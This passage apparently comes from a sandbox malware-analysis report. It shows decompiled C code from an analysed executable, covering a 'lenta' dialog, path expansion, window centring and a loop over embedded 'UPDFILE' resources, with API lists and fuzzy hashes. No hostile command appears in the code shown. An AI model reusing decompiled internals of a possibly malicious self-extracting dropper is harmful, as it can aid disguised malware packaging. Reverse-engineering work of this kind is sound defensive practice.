                                                                                                                                                                                                                                              					EndDialog(_a4, 2);
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t24 = _a4;
                                                                                                                                                                                                                                              					E001A43D0(_t24, _t12);
                                                                                                                                                                                                                                              					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t24, 0x838,  *0x1a9404);
                                                                                                                                                                                                                                              					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t11 == 1) {
                                                                                                                                                                                                                                              					_t22 = _a12;
                                                                                                                                                                                                                                              					if(_t22 < 6) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 <= 7) {
                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                              						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 != 0x839) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x1a91dc = 1;
                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x001a3459
                                                                                                                                                                                                                                              0x001a345c
                                                                                                                                                                                                                                              0x001a34d8
                                                                                                                                                                                                                                              0x001a34de
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a34e0
                                                                                                                                                                                                                                              0x001a345e
                                                                                                                                                                                                                                              0x001a3463
                                                                                                                                                                                                                                              0x001a349a
                                                                                                                                                                                                                                              0x001a34a0
                                                                                                                                                                                                                                              0x001a34a7
                                                                                                                                                                                                                                              0x001a34b2
                                                                                                                                                                                                                                              0x001a34c4
                                                                                                                                                                                                                                              0x001a34cb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a34cb
                                                                                                                                                                                                                                              0x001a3468
                                                                                                                                                                                                                                              0x001a346e
                                                                                                                                                                                                                                              0x001a3474
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a347c
                                                                                                                                                                                                                                              0x001a348c
                                                                                                                                                                                                                                              0x001a3490
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3496
                                                                                                                                                                                                                                              0x001a3484
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3486
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3486
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 001A3490
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 001A349A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 001A34B2
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000838), ref: 001A34C4
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 001A34CB
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000002), ref: 001A34D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                              • Opcode ID: d8273c8e425cf6e0dd3735b771a2ea270871ee0d9eec7d50b3e991fa5f8f7daf
                                                                                                                                                                                                                                              • Instruction ID: 6b772b8e4a1a071f80b63af1a7869c7710440b4b10dfb99e5ce8eeb687cfec49
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8273c8e425cf6e0dd3735b771a2ea270871ee0d9eec7d50b3e991fa5f8f7daf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB01B139240114ABC72A5F68DC0CAAD3A64EF0F750F504010FA66869A0CB749FC2DB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E001A2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				char _t32;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				char* _t38;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				intOrPtr* _t55;
                                                                                                                                                                                                                                              				CHAR* _t59;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t60 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_t65 = _a4;
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t64 = __ecx;
                                                                                                                                                                                                                                              				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                              					GetModuleFileNameA( *0x1a9a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_t17 =  *_t64;
                                                                                                                                                                                                                                              						if(_t17 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                              						 *_t65 =  *_t64;
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t65[1] = _t64[1];
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                              							L19:
                                                                                                                                                                                                                                              							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                              								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                              									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                              										goto L19;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E001A1680(_t65, E001A17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              									_t52 = _t65;
                                                                                                                                                                                                                                              									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                              									_t60 = _t14;
                                                                                                                                                                                                                                              									do {
                                                                                                                                                                                                                                              										_t32 =  *_t52;
                                                                                                                                                                                                                                              										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                              									} while (_t32 != 0);
                                                                                                                                                                                                                                              									goto L17;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								E001A65E8( &_v268);
                                                                                                                                                                                                                                              								_t55 =  &_v268;
                                                                                                                                                                                                                                              								_t62 = _t55 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t34 =  *_t55;
                                                                                                                                                                                                                                              									_t55 = _t55 + 1;
                                                                                                                                                                                                                                              								} while (_t34 != 0);
                                                                                                                                                                                                                                              								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                              								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                              									 *_t38 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								E001A1680(_t65, E001A17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              								_t59 = _t65;
                                                                                                                                                                                                                                              								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                              								_t60 = _t12;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t42 =  *_t59;
                                                                                                                                                                                                                                              									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                              								} while (_t42 != 0);
                                                                                                                                                                                                                                              								L17:
                                                                                                                                                                                                                                              								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *_t65 = _t17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                              			}






















                                                                                                                                                                                                                                              0x001a2aac
                                                                                                                                                                                                                                              0x001a2ab7
                                                                                                                                                                                                                                              0x001a2abc
                                                                                                                                                                                                                                              0x001a2abe
                                                                                                                                                                                                                                              0x001a2ac3
                                                                                                                                                                                                                                              0x001a2ac6
                                                                                                                                                                                                                                              0x001a2ac9
                                                                                                                                                                                                                                              0x001a2ace
                                                                                                                                                                                                                                              0x001a2ae6
                                                                                                                                                                                                                                              0x001a2bdc
                                                                                                                                                                                                                                              0x001a2bdc
                                                                                                                                                                                                                                              0x001a2be0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2af2
                                                                                                                                                                                                                                              0x001a2afc
                                                                                                                                                                                                                                              0x001a2b00
                                                                                                                                                                                                                                              0x001a2b05
                                                                                                                                                                                                                                              0x001a2b05
                                                                                                                                                                                                                                              0x001a2b0b
                                                                                                                                                                                                                                              0x001a2bca
                                                                                                                                                                                                                                              0x001a2bd1
                                                                                                                                                                                                                                              0x001a2b11
                                                                                                                                                                                                                                              0x001a2b18
                                                                                                                                                                                                                                              0x001a2b26
                                                                                                                                                                                                                                              0x001a2b99
                                                                                                                                                                                                                                              0x001a2bc8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2b9b
                                                                                                                                                                                                                                              0x001a2bae
                                                                                                                                                                                                                                              0x001a2bb3
                                                                                                                                                                                                                                              0x001a2bb5
                                                                                                                                                                                                                                              0x001a2bb5
                                                                                                                                                                                                                                              0x001a2bb8
                                                                                                                                                                                                                                              0x001a2bb8
                                                                                                                                                                                                                                              0x001a2bba
                                                                                                                                                                                                                                              0x001a2bbb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2bb8
                                                                                                                                                                                                                                              0x001a2b28
                                                                                                                                                                                                                                              0x001a2b2e
                                                                                                                                                                                                                                              0x001a2b33
                                                                                                                                                                                                                                              0x001a2b39
                                                                                                                                                                                                                                              0x001a2b3c
                                                                                                                                                                                                                                              0x001a2b3c
                                                                                                                                                                                                                                              0x001a2b3e
                                                                                                                                                                                                                                              0x001a2b3f
                                                                                                                                                                                                                                              0x001a2b55
                                                                                                                                                                                                                                              0x001a2b5d
                                                                                                                                                                                                                                              0x001a2b64
                                                                                                                                                                                                                                              0x001a2b64
                                                                                                                                                                                                                                              0x001a2b7a
                                                                                                                                                                                                                                              0x001a2b7f
                                                                                                                                                                                                                                              0x001a2b81
                                                                                                                                                                                                                                              0x001a2b81
                                                                                                                                                                                                                                              0x001a2b84
                                                                                                                                                                                                                                              0x001a2b84
                                                                                                                                                                                                                                              0x001a2b86
                                                                                                                                                                                                                                              0x001a2b87
                                                                                                                                                                                                                                              0x001a2bbf
                                                                                                                                                                                                                                              0x001a2bc1
                                                                                                                                                                                                                                              0x001a2bc1
                                                                                                                                                                                                                                              0x001a2b26
                                                                                                                                                                                                                                              0x001a2bda
                                                                                                                                                                                                                                              0x001a2bda
                                                                                                                                                                                                                                              0x001a2be6
                                                                                                                                                                                                                                              0x001a2be6
                                                                                                                                                                                                                                              0x001a2bf8

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 001A2AE6
                                                                                                                                                                                                                                              • IsDBCSLeadByte.KERNEL32(00000000), ref: 001A2AF2
                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 001A2B12
                                                                                                                                                                                                                                              • CharUpperA.USER32 ref: 001A2B1E
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?), ref: 001A2B55
                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 001A2BD4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 571164536-0
                                                                                                                                                                                                                                              • Opcode ID: 78bda8339ed3848295c2022bd7a616e69cc79a4393af94b3fc24d08899e6fec7
                                                                                                                                                                                                                                              • Instruction ID: d7696eed8a4b1b50cd713b037a04d62e481d04e7f0fff8bc5590e732933b95cc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78bda8339ed3848295c2022bd7a616e69cc79a4393af94b3fc24d08899e6fec7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6841267C6082456FDB269F388C54AFD7BA99F57310F14009AE8C283642DB758E86CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E001A43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				struct tagRECT _v24;
                                                                                                                                                                                                                                              				struct tagRECT _v40;
                                                                                                                                                                                                                                              				struct HWND__* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				int _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				int _v60;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				struct HWND__* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t67;
                                                                                                                                                                                                                                              				struct HWND__* _t68;
                                                                                                                                                                                                                                              				struct HDC__* _t69;
                                                                                                                                                                                                                                              				int _t72;
                                                                                                                                                                                                                                              				signed int _t74;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t63 = __edx;
                                                                                                                                                                                                                                              				_t29 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                              				_t68 = __edx;
                                                                                                                                                                                                                                              				_v44 = __ecx;
                                                                                                                                                                                                                                              				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                              				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                              				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                              				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                              				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                              				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                              				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                              				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                              				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                              				_t56 = _v48;
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                              				_t67 = 0;
                                                                                                                                                                                                                                              				if(_t72 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v52;
                                                                                                                                                                                                                                              					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                              						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t72 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                              				if(_t59 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v60;
                                                                                                                                                                                                                                              					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                              						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t59 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                              			}
























                                                                                                                                                                                                                                              0x001a43d0
                                                                                                                                                                                                                                              0x001a43d8
                                                                                                                                                                                                                                              0x001a43df
                                                                                                                                                                                                                                              0x001a43e6
                                                                                                                                                                                                                                              0x001a43ec
                                                                                                                                                                                                                                              0x001a43f1
                                                                                                                                                                                                                                              0x001a4400
                                                                                                                                                                                                                                              0x001a4403
                                                                                                                                                                                                                                              0x001a440b
                                                                                                                                                                                                                                              0x001a4420
                                                                                                                                                                                                                                              0x001a4429
                                                                                                                                                                                                                                              0x001a4437
                                                                                                                                                                                                                                              0x001a4444
                                                                                                                                                                                                                                              0x001a4447
                                                                                                                                                                                                                                              0x001a444d
                                                                                                                                                                                                                                              0x001a4454
                                                                                                                                                                                                                                              0x001a445b
                                                                                                                                                                                                                                              0x001a4460
                                                                                                                                                                                                                                              0x001a4461
                                                                                                                                                                                                                                              0x001a4467
                                                                                                                                                                                                                                              0x001a446f
                                                                                                                                                                                                                                              0x001a4473
                                                                                                                                                                                                                                              0x001a4473
                                                                                                                                                                                                                                              0x001a4463
                                                                                                                                                                                                                                              0x001a4463
                                                                                                                                                                                                                                              0x001a4463
                                                                                                                                                                                                                                              0x001a447a
                                                                                                                                                                                                                                              0x001a4481
                                                                                                                                                                                                                                              0x001a4484
                                                                                                                                                                                                                                              0x001a448a
                                                                                                                                                                                                                                              0x001a4492
                                                                                                                                                                                                                                              0x001a4496
                                                                                                                                                                                                                                              0x001a4496
                                                                                                                                                                                                                                              0x001a4486
                                                                                                                                                                                                                                              0x001a4486
                                                                                                                                                                                                                                              0x001a4486
                                                                                                                                                                                                                                              0x001a44b8

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 001A43F1
                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 001A440B
                                                                                                                                                                                                                                              • GetDC.USER32(?), ref: 001A4423
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 001A442E
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 001A443A
                                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 001A4447
                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001A44A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2212493051-0
                                                                                                                                                                                                                                              • Opcode ID: 5d133f08e6af1cc8e38769aca5f987d56eae32beb9a8488db72c2f6fa0f28a88
                                                                                                                                                                                                                                              • Instruction ID: bb4c9fa2719f0e1cf32e1cd24f36de0b827b62c7f7567965babc8cccc1aa8ba8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d133f08e6af1cc8e38769aca5f987d56eae32beb9a8488db72c2f6fa0f28a88
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF311776A00119ABCB14CFB8DD899EEBBB9EF8A310F554169F805B3250DB70AD45CB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                                                                                              			E001A6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				struct HRSRC__* _t21;
                                                                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				intOrPtr* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                              				_t46 = 0;
                                                                                                                                                                                                                                              				_v32 = __ecx;
                                                                                                                                                                                                                                              				_v36 = 0;
                                                                                                                                                                                                                                              				_t36 = 1;
                                                                                                                                                                                                                                              				E001A171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                              					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                              					if(_t45 == 0) {
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x80070714;
                                                                                                                                                                                                                                              						_t36 = _t46;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                              						_t44 = _t5;
                                                                                                                                                                                                                                              						_t40 = _t44;
                                                                                                                                                                                                                                              						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                              						_t47 = _t6;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t26 =  *_t40;
                                                                                                                                                                                                                                              							_t40 = _t40 + 1;
                                                                                                                                                                                                                                              						} while (_t26 != 0);
                                                                                                                                                                                                                                              						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                              						_t46 = _t51;
                                                                                                                                                                                                                                              						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                              						 *0x1aa288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                              						_t30 = _v32();
                                                                                                                                                                                                                                              						if(_t51 != _t51) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(_t45);
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							_t36 = 0;
                                                                                                                                                                                                                                              							FreeResource(??);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							FreeResource();
                                                                                                                                                                                                                                              							_v36 = _v36 + 1;
                                                                                                                                                                                                                                              							E001A171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                              							_t46 = 0;
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					return E001A6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}






















                                                                                                                                                                                                                                              0x001a6298
                                                                                                                                                                                                                                              0x001a62a0
                                                                                                                                                                                                                                              0x001a62a7
                                                                                                                                                                                                                                              0x001a62ad
                                                                                                                                                                                                                                              0x001a62af
                                                                                                                                                                                                                                              0x001a62bb
                                                                                                                                                                                                                                              0x001a62c3
                                                                                                                                                                                                                                              0x001a62c4
                                                                                                                                                                                                                                              0x001a633b
                                                                                                                                                                                                                                              0x001a633b
                                                                                                                                                                                                                                              0x001a6345
                                                                                                                                                                                                                                              0x001a634d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a62da
                                                                                                                                                                                                                                              0x001a62de
                                                                                                                                                                                                                                              0x001a635f
                                                                                                                                                                                                                                              0x001a6369
                                                                                                                                                                                                                                              0x001a62e0
                                                                                                                                                                                                                                              0x001a62e0
                                                                                                                                                                                                                                              0x001a62e0
                                                                                                                                                                                                                                              0x001a62e3
                                                                                                                                                                                                                                              0x001a62e5
                                                                                                                                                                                                                                              0x001a62e5
                                                                                                                                                                                                                                              0x001a62e8
                                                                                                                                                                                                                                              0x001a62e8
                                                                                                                                                                                                                                              0x001a62ea
                                                                                                                                                                                                                                              0x001a62eb
                                                                                                                                                                                                                                              0x001a62ef
                                                                                                                                                                                                                                              0x001a62f1
                                                                                                                                                                                                                                              0x001a62f3
                                                                                                                                                                                                                                              0x001a6302
                                                                                                                                                                                                                                              0x001a6308
                                                                                                                                                                                                                                              0x001a630d
                                                                                                                                                                                                                                              0x001a6314
                                                                                                                                                                                                                                              0x001a6314
                                                                                                                                                                                                                                              0x001a6316
                                                                                                                                                                                                                                              0x001a6319
                                                                                                                                                                                                                                              0x001a6355
                                                                                                                                                                                                                                              0x001a6357
                                                                                                                                                                                                                                              0x001a631b
                                                                                                                                                                                                                                              0x001a631b
